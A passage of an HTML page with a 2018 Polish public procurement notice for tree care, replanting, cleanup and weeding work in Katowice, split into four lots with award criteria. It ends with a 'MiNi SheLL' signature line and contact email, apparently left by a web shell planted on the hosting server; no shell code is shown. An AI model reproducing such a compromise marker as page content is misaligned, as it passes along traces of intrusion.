ust. 1 pkt 2) - 6) ustawy Prawo zamówień publicznych.4. W przypadku wystąpienia okoliczności wymienionych w ust. 2 lit. a) - c), g) i ust. 3 niniejszego paragrafu zmianie, wydłużeniu bądź skróceniu, może ulec termin wykonania zlecenia/umowy o czas niezbędny do zakończenia realizacji zamówienia w sposób należyty, nie dłużej jednak niż o czas trwania tych okoliczności, lub o czas który został przewidziany na wykonanie usług z których zrezygnowano. W przypadkach opisanych w pkt d) - e) okres obowiązywania umowy może ulec zmianie w sposób wskazany w wymienionych punktach. 5. W przypadku wystąpienia okoliczności wymienionych w ust. 2 lit. c), f), g) i ust. 3 niniejszego paragrafu, Zamawiający dopuszcza możliwość zmiany wynagrodzenia. 6. W przypadku, o którym mowa w ust. 2 pkt f) niniejszego paragrafu, zmiana wynagrodzenia Wykonawcy może nastąpić, o ile okoliczności wymienione w art. 142 ust. 5 ustawy Pzp będą miały wpływ na koszty wykonania zamówienia. Wzrost wynagrodzenia nie może być wyższy niż wzrost kosztów wykonania zamówienia spowodowanych okolicznościami, o których mowa w art. 142 ust. 5.7. Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu Stron wyrażoną na piśmie, pod rygorem nieważności.8. Strona występująca o istotną zmianę postanowień zawartej umowy zobowiązana jest do udokumentowania zaistnienia okoliczności, o których mowa w ust. 1 niniejszego paragrafu. Wniosek o zmianę postanowień zawartej umowy musi być wyrażony na piśmie.	</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-04-12</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>,,Pielęgnacja zieleni niskiej i wysokiej na terenie miasta Katowice w 2018 roku"</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie Nr 1 - Wycinka i pielęgnacja drzew i krzewów na terenie miasta, również w pasach drogowych (obwód pnia drzew mierzony na wysokości 130 cm) t.j.: 1) Wycinka drzew o obwodzie pnia do 100 cm z frezowaniem, karczowniem lub usunięciem pnia (w przypadku braku możliwości wyfrezowania) i wywozem,2) Wycinka drzew o obwodzie pnia do 100 cm bez frezowania z wywozem,3) Wycinka drzew o obwodzie pnia od 101 cm do 200 cm z frezowaniem, karczowaniem lub usunięciem pnia (w przypadku braku możliwości wyfrezowania) i wywozem,4) Wycinka drzew o obwodzie pnia od 101 cm do 200 cm bez frezowania, z wywozem,5) Wycinka drzew o obwodzie pnia powyżej 200 cm z frezowaniem, karczowaniem i usunięciem pnia (w przypadku braku możliwości wyfrezowania) i wywozem,6) Wycinka drzew o obwodzie pnia powyżej 200 cm bez frezowania z wywozem,7) Przeprowadzenie prac w obrębie korony drzew zgodnie z zasadami sztuki ogrodniczej z wywozem (w zakresie przewidzianym w art. 87a ust. 2 Ustawy o ochronie przyrody),8) Formowanie platanów rosnących w pasach drogowych zgodnie z zasadami sztuki ogrodniczej z wywozem (w zakresie przewidzianym w art. 87a ust. 2 Ustawy o ochronie przyrody),9) Przeprowadzenie prac w obrębie korony drzew w celu utrzymania skrajni wraz z zebraniem i wywiezieniem powstałych odpadów,10) Cięcia techniczne polegające na odsłonięciu latarni oświetlenia ulicznego wraz z zebraniem i wywiezieniem powstałych odpadów,11) Wycinka krzewów z karczowaniem i wywozem,12) Przycinanie krzewów wraz z zebraniem i wywiezieniem powstałych odpadów w m2 powierzchni cięcia,13) Usuwanie karp (karczowanie) z wywozem i kosztami zagospodarowania pozostałości,14) Frezowanie pni z wywozem,15) Wymiana gruntu pod nasadzenia,16) Uprzątnięcie złomów i wywrotów wraz z frezowaniem lub karczowaniem pnia, zebraniem i wywiezieniem powstałych odpadów i drewna za,17) Zakładanie systemu wiązań elastycznych stabilizujących koronę drzewa z certyfikatami na jednym drzewie min. 2 - 3 szt. wiązań w zależności od potrzeby.18) Sporządzenie opinii ornitologicznej.Zadanie Nr 2 - Wykonywanie nasadzeń zastępczych w 2018 roku obejmuje:1) Sadzenie drzew form naturalnych i piennych (w tym drzew w odmianach) o obwodzie pnia 12-14 cm mierzonej na wysokości 100 cm od nasady pnia.2) Sadzenie pnączy, krzewów w formie naturalnej, dla gatunków i odmian silnie rosnących wysokość /szerokość 60-80 cm/, dla wolno rosnących /20-30 cm/.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>77300000-3, 77310000-6, 77311000-3, 77314100-5, 77312100-1, 90000000-7, 90600000-3, 90512000-9, 90511300-5<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">norma emisji spalin EURO</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>TERMIN WYKONYWANIA PRAC dla ZADANIA Nr 1 i 2: od dnia podpisania umowy do 20.12.2018 roku z możliwością przedłużenia albo skrócenia terminu realizacji umowy do wyczerpania maksymalnej kwoty przeznaczonej na realizację umowy.<br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Wykonywanie prac interwencyjnych na terenach miejskich w 2018 roku" </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1) Oczyszczanie terenów z resztek budowlanych, gruzu i ziemi - zebranie i wywóz odpadów wraz z ich zagospodarowaniem.2) Oczyszczanie terenów z zalegających odpadów komunalnych - zebranie i wywóz odpadów wraz z ich zagospodarowaniem.3) Oczyszczanie terenów z zalegających odpadów ulegających biodegradacji (liście, gałęzie, trawa) - zebranie i wywóz powstałych odpadów wraz z ich zagospodarowaniem.4) Karczowanie zagajników, skupin krzewów oraz drzew w wieku do 10 lat. 5) Chemiczne zwalczanie Barszczu Sosnowskiego - oprysk, wykoszenie, zebranie i wywiezienie powstałych odpadów wraz z zagospodarowaniem.6) Pielęgnację zieleni wysokiej - przycięcie drzew w celu utrzymania skrajni wraz z zebraniem i wywiezieniem powstałych odpadów.7) Pielęgnację zieleni wysokiej - cięcie pielęgnacyjne w koronie drzew, w tym przy użyciu zwyżki, w zakresie przewidzianym art. 87a ustawy o ochronie przyrody - zebranie i wywiezienie powstałych odpadów.8) Usuwanie odrostów drzew oraz samosiewów wraz z zebraniem i wywiezieniem powstałych odpadów.9) Przycięcie skupin krzewów w celu odmłodzenia wraz z zebraniem i wywiezieniem powstałych odpadów.10) Przycinanie krzewów żywopłotowych z trzech stron wraz z zebraniem i wywiezieniem powstałych odpadów.11) Odchwaszczanie skupin krzewów wraz z załadunkiem, transportem i przekazaniem odpadów do utylizacji bezpośrednio po zakończeniu prac (wraz z kosztami utylizacji).12) Uprzątnięcie złomów i wywrotów wraz z frezowaniem pnia, zebraniem i wywiezieniem powstałych odpadów.13) Koszenie trawników z wygrabieniem i wywiezieniem pokosu wraz z ich zagospodarowaniem.14) Wyrównywanie terenu wraz z wysiewem trawy na uporządkowanych terenach.15) Usunięcie darni i chwastów z chodników (z wywozem i zagospodarowaniem powstałych odpadów). 16) Zamiatanie dróg parkowych, nawierzchni utwardzonych (alejki, ścieżki, schody itp.).17) Utrzymanie zimowe: odśnieżanie nawierzchni utwardzonych, posypywanie piaskiem lub grysem oblodzonych nawierzchni utwardzonych wraz z wywiezieniem.18) Wygrabienie liści wraz z zebraniem, wywozem i ich zagospodarowaniem.19) Opróżnianie koszy betonowych i na psie odchody na terenach miejskich.20) Odchwaszczanie rabat kwiatowych wraz z załadunkiem, transportem i przekazaniem odpadów do utylizacji bezpośrednio po zakończeniu prac (wraz z kosztami utylizacji).21) Interwencyjne podlewanie krzewów oraz roślin rabatowych.22) Usunięcie nośników reklamowych - usuwanie różnego typu naklejek np. reklam, ogłoszeń i plakatów z elementów wyposażenia terenu (słupów oświetleniowych, ławek, koszy, tablic informacyjnych, słupków, urządzeń zabawowych i gimnastycznych, ogrodzeń itp.),usuwanie różnego rodzaju folii, sznurów, pasów oraz plakatów, ogłoszeń, reklamówek z pni oraz z koron drzew i krzewów,23) Usunięcie wielkoformatowych nośników reklamowych - tablice reklamowe, billboardy wraz z konstrukcjami nośnymi,24) Oczyszczenie betonowego słupa ogłoszeniowego.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>77300000-3, 77310000-6, 77311000-3, 77314100-5, 77312100-1, 90000000-7, 90600000-3, 90512000-9, 90511300-5<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2018-12-20<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">norma emisji spalin EURO</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>1. TERMIN WYKONYWANIA PRAC dla Części II: od dnia podpisania umowy do 20.12.2018 roku z możliwością przedłużenia albo skrócenia terminu realizacji umowy do wyczerpania maksymalnej kwoty przeznaczonej na realizację umowy.<br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Wykonywanie prac interwencyjnych w pasach drogowych w 2018 roku</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1)	Oczyszczanie terenów z resztek budowlanych, gruzu, ziemi - zebranie i wywóz odpadów wraz z ich zagospodarowaniem.2)	Oczyszczanie terenów z zalegających odpadów komunalnych - zebranie i wywóz odpadów wraz z ich zagospodarowaniem.3)	Oczyszczanie terenów z zalegających odpadów ulegających biodegradacji (liście, gałęzie, trawa) - zebranie i wywóz powstałych odpadów wraz z ich zagospodarowaniem.4)	Karczowanie krzewów i drzew, zebranie i wywiezienie powstałych odpadów wraz z zagospodarowaniem.5)	Pielęgnację zieleni wysokiej - przycięcie drzew w celu utrzymania skrajni wraz z zebraniem i wywiezieniem powstałych odpadów.6)	Pielęgnację zieleni wysokiej - cięcie pielęgnacyjne w koronie drzew, w tym przy użyciu zwyżki, w zakresie przewidzianym art. 87a ustawy o ochronie przyrody) - zebranie i wywiezienie powstałych odpadów.7)	Cięcia techniczne polegające na odsłonięciu latarni oświetlenia ulicznego.8)	Usuwanie odrostów drzew w pasach drogowych wraz z zebraniem i wywiezieniem powstałych odpadów.9)	Przycinanie skupin krzewów w celu odmłodzenia wraz z zebraniem i wywiezieniem powstałych odpadów.10)	Przycinanie krzewów żywopłotowych z trzech stron wraz z zebraniem i wywiezieniem powstałych odpadów.11)	Odchwaszczanie skupin krzewów wraz z załadunkiem, transportem i przekazaniem odpadów do utylizacji bezpośrednio po zakończeniu prac (wraz z kosztami utylizacji).12)	Uprzątnięcie złomów i wywrotów wraz z frezowaniem pnia zebraniem i wywiezieniem powstałych odpadów.13)	Koszenie trawników z wygrabieniem i wywiezieniem pokosu wraz z ich zagospodarowaniem.14)	Wyrównywanie terenu wraz z wysiewem trawy na uporządkowanych terenach.15)	Usunięcie darni z chodników z wywozem i zagospodarowaniem powstałych odpadów16)	Zamiatanie nawierzchni utwardzonych. 17)	Utrzymanie zimowe: odśnieżanie nawierzchni utwardzonych, posypywanie piaskiem lub grysem oblodzonych nawierzchni utwardzonych wraz z wywiezieniem.18)	Wygrabienie liści wraz z zebraniem, wywozem i zagospodarowaniem.19)	Opróżnianie koszy przyulicznych.20)	Odchwaszczanie rabat kwiatowych wraz z załadunkiem, transportem i przekazaniem odpadów do utylizacji bezpośrednio po zakończeniu prac (wraz z kosztami utylizacji).21)	Interwencyjne podlewanie krzewów oraz roślin rabatowych.22)	Odchwaszczanie chodników z wrastającej zieleni poprzez oprysk środkami chwastobójczymi biodegradowalnymi wraz z usunięciem pozostałości uschniętych roślin oraz darni.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>77300000-3, 77310000-6, 77311000-3, 77314100-5, 77312100-1, 90000000-7, 90600000-3, 90512000-9, 90511300-5<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2018-12-20<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">norma emisji spalin EURO</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>1. TERMIN WYKONYWANIA PRAC dla Części III od dnia podpisania umowy do 20.12.2018 roku z możliwością przedłużenia albo skrócenia terminu realizacji umowy do wyczerpania maksymalnej kwoty przeznaczonej na realizację umowy.<br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>Usunięcie darni i chwastów z chodników w 2018 roku.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1) Usunięcie darni, chwastów i samosiewów z chodników (z wywozem i zagospodarowaniem powstałych odpadów),2) Zamiatanie nawierzchni utwardzonych (alejki, chodniki, ścieżki, schody itp.),3) Odchwaszczanie chodników z wrastającej zieleni poprzez oprysk środkami chwastobójczymi	biodegradowalnymi wraz z usunięciem i wywozem pozostałości uschniętych roślin oraz darni.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>77300000-3, 77310000-6, 77311000-3, 77314100-5, 77312100-1, 90000000-7, 90600000-3, 90512000-9, 90511300-5<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2018-12-20<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">norma emisji spalin EURO</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>1. TERMIN WYKONANIA PRAC dla Części IV: od dnia podpisania umowy do 20.12.2018 roku z możliwością przedłużenia albo skrócenia terminu realizacji umowy do wyczerpania maksymalnej kwoty przeznaczonej na realizację umowy.<br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com